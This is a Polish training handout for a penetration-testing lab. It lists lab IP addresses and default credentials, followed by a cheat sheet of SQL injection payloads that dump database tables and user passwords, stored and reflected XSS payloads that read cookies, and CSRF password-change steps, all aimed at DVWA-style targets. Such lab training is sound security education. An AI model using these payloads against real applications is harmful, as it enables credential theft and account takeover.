Szkolenie
Adresacja LAB:
- Windows 7 - 192.168.1.12
- Windows 10 - 192.168.1.13
- Server 2008 - 192.168.1.15
- Metasploitable - 192.168.1.16
- Server 2012r2 - 192.168.1.17
- HOST - 192.168.1.1
Hasła do maszyn:
- Windows - administrator/P@ssw0rd
- Kali - kali/kali
- Metasploitable - msfadmin/msfadmin
- DVWA - admin/password
Link do materiałów: link
Przerwy:
- 10:30
- 13:00 Obiadowa
- 15:00
--------------
SQL Injection
--------------
1
%' or '0'='0
Always True Scenario
%' or 0=0 union select null, version() #
Display Database Version
%' or 0=0 union select null, user() #
Display Database User
%' or 0=0 union select null, database() #
Display Database Name
%' and 1=0 union select null, table_name from information_schema.tables #
Display all tables in information_schema
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Display all the user tables in information_schema
%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Display all the columns fields in the information_schema user table
%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Display Column field contents
-------------------
Attacking with XSS
-------------------
/XSS Stored basic Exploit Test
Test 1
<script>alert("This is a XSS Exploit")</script>
/XSS Stored IFRAME Exploit Test:
Test 2
<iframe src="https://wp.pl"></iframe>
/XSS Stored COOKIE Exploit Test
Test 3
<script>alert(document.cookie)</script>
/Attacking with CSRF / Cross-Site Request Forgery (CSRF)
new password: abc123
confirm new password: abc123
Click Change
modify passwords in URL to test123
Reload page
login with test123
/Select XSS reflected
<script>alert(document.cookie)</script>